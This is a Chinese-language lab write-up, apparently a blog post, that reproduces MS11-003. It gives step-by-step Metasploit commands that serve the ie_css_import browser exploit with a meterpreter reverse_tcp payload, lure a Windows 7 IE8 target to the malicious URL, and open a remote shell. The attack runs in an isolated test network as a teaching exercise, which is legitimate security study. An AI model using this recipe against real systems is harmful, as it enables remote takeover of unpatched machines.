MS11_003 漏洞复现

实验环境:

攻击机:Kali Linux 2022.2(IP:172.16.8.33/24)

靶机:Windows 7 x64(IP:172.16.8.4/24)

实验步骤:

1、使用msfconsole命令打开Metasploit渗透测试平台

使用search命令搜索ms11_003_ie_css_import模块

search ms11-003

使用use命令对该模块进行调用,并通过show options命令查看模块的详细配置参数

use exploit/windows/browser/ms11_003_ie_css_import

show options

2、使用set payload命令设置载荷模块

set payload windows/meterpreter/reverse_tcp

使用set SRVHOST 172.16.8.33命令设置本地主机监听的地址

使用set URIPATH FM命令来设置访问模块的具体地址(默认为随机生成)

使用set LHOST 172.16.8.33命令设置载荷模块监听的本地地址

设置完成后,使用show options命令对模块已配置的参数进行检查

最后设置模块的目标,使用show targets命令查看支持的目标列表

使用set target 1命令设置目标为Internet Explorer 8

3、使用exploit -j命令在后台启动该模块,等待靶机连接

exploit -j

将生成的木马链接,用靶机的32位IE浏览器进行访问

http://172.16.8.33:8080/FM

回到Kali攻击机上查看,发现上线了一个会话

使用sessions -i 命令查看上线的会话

使用sessions -i 1命令切换到会话1,在使用shell命令开启一个命令行终端

漏洞复现成功

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FatCat-BOY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值